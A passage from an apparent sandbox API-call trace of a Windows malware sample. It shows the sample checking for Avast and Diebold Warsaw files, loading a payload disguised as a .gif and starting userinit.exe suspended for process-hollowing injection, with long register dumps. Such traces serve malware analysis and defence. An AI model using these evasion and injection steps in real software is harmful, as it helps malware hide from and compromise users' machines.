[109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0209.261] ResumeThread (hThread=0x148) returned 0x1
[0209.261] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.261] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.261] GlobalUnlock (hMem=0x95000c) returned 0
[0209.261] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0209.261] GlobalUnlock (hMem=0x950004) returned 0
[0209.269] Sleep (dwMilliseconds=0xe74e)
[0219.282] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0219.283] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0219.283] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0219.283] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0219.283] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150
[0219.283] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0219.283] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0219.283] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0219.283] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0219.286] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0219.286] ReadFile (in: hFile=0x150, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0219.293] CloseHandle (hObject=0x150) returned 1
[0219.293] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.294] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.294] GlobalUnlock (hMem=0x95000c) returned 0
[0219.294] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0219.294] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.295] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.295] GlobalUnlock (hMem=0x95000c) returned 0
[0219.295] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0219.295] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0219.296] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0219.296] GlobalUnlock (hMem=0x95000c) returned 0
[0219.296] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0219.297] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0219.298] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0219.298] GlobalUnlock (hMem=0x95000c) returned 0
[0219.298] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0219.298] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0219.299] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0219.299] GlobalUnlock (hMem=0x95000c) returned 0
[0219.299] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0219.300] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0219.300] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0219.300] GlobalUnlock (hMem=0x95000c) returned 0
[0219.300] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0219.301] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.302] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.302] GlobalUnlock (hMem=0x95000c) returned 0
[0219.302] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0219.303] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.304] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.304] GlobalUnlock (hMem=0x95000c) returned 0
[0219.304] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0219.304] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.305] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.305] GlobalUnlock (hMem=0x95000c) returned 0
[0219.305] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0219.305] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.306] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.306] GlobalUnlock (hMem=0x95000c) returned 0
[0219.306] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0219.306] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.307] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.307] GlobalUnlock (hMem=0x95000c) returned 0
[0219.307] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0219.307] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.308] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.308] GlobalUnlock (hMem=0x95000c) returned 0
[0219.308] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0219.308] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.309] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.309] GlobalUnlock (hMem=0x95000c) returned 0
[0219.309] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0219.309] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.310] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.310] GlobalUnlock (hMem=0x95000c) returned 0
[0219.310] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0219.310] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.311] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.311] GlobalUnlock (hMem=0x95000c) returned 0
[0219.311] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0219.311] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.312] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.312] GlobalUnlock (hMem=0x95000c) returned 0
[0219.312] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0219.314] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0219.315] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0219.315] GlobalUnlock (hMem=0x95000c) returned 0
[0219.315] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0219.315] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0219.316] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0219.316] GlobalUnlock (hMem=0x95000c) returned 0
[0219.316] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0219.318] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0219.319] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0219.319] GlobalUnlock (hMem=0x95000c) returned 0
[0219.319] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0219.319] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.320] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.320] GlobalUnlock (hMem=0x95000c) returned 0
[0219.320] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0219.320] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.321] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.321] GlobalUnlock (hMem=0x95000c) returned 0
[0219.321] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0219.321] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.322] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.322] GlobalUnlock (hMem=0x95000c) returned 0
[0219.322] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0219.322] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.323] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.323] GlobalUnlock (hMem=0x95000c) returned 0
[0219.323] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0219.323] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.323] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.323] GlobalUnlock (hMem=0x95000c) returned 0
[0219.323] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0219.324] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.324] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.324] GlobalUnlock (hMem=0x95000c) returned 0
[0219.324] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0219.324] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.325] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.325] GlobalUnlock (hMem=0x95000c) returned 0
[0219.325] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0219.325] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.326] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.326] GlobalUnlock (hMem=0x95000c) returned 0
[0219.326] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0219.326] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.327] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.327] GlobalUnlock (hMem=0x95000c) returned 0
[0219.327] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0219.327] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.328] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.328] GlobalUnlock (hMem=0x95000c) returned 0
[0219.328] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0219.328] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.330] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.330] GlobalUnlock (hMem=0x95000c) returned 0
[0219.330] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0219.330] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.331] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.331] GlobalUnlock (hMem=0x95000c) returned 0
[0219.331] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0219.331] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.332] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.332] GlobalUnlock (hMem=0x95000c) returned 0
[0219.332] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0219.332] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.333] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.333] GlobalUnlock (hMem=0x95000c) returned 0
[0219.333] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0219.333] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.334] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.334] GlobalUnlock (hMem=0x95000c) returned 0
[0219.334] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0219.334] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.335] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.335] GlobalUnlock (hMem=0x95000c) returned 0
[0219.335] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0219.335] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.336] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.336] GlobalUnlock (hMem=0x95000c) returned 0
[0219.336] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0219.336] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.336] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.337] GlobalUnlock (hMem=0x95000c) returned 0
[0219.337] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0219.337] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.337] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.337] GlobalUnlock (hMem=0x95000c) returned 0
[0219.338] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0219.338] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.338] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.338] GlobalUnlock (hMem=0x95000c) returned 0
[0219.338] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0219.339] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.339] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.339] GlobalUnlock (hMem=0x95000c) returned 0
[0219.339] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0219.339] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.340] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.340] GlobalUnlock (hMem=0x95000c) returned 0
[0219.340] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0219.340] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.341] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.341] GlobalUnlock (hMem=0x95000c) returned 0
[0219.341] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0219.341] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.342] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.342] GlobalUnlock (hMem=0x95000c) returned 0
[0219.342] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0219.342] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.343] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.343] GlobalUnlock (hMem=0x95000c) returned 0
[0219.343] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0219.343] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.344] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.344] GlobalUnlock (hMem=0x95000c) returned 0
[0219.344] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0219.344] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.345] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.345] GlobalUnlock (hMem=0x95000c) returned 0
[0219.345] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0219.345] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0219.346] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x14c, hThread=0x150, dwProcessId=0x94c, dwThreadId=0x950)) returned 1
[0219.350] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0219.350] GetThreadContext (in: hThread=0x150, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x2c2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14f888, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, 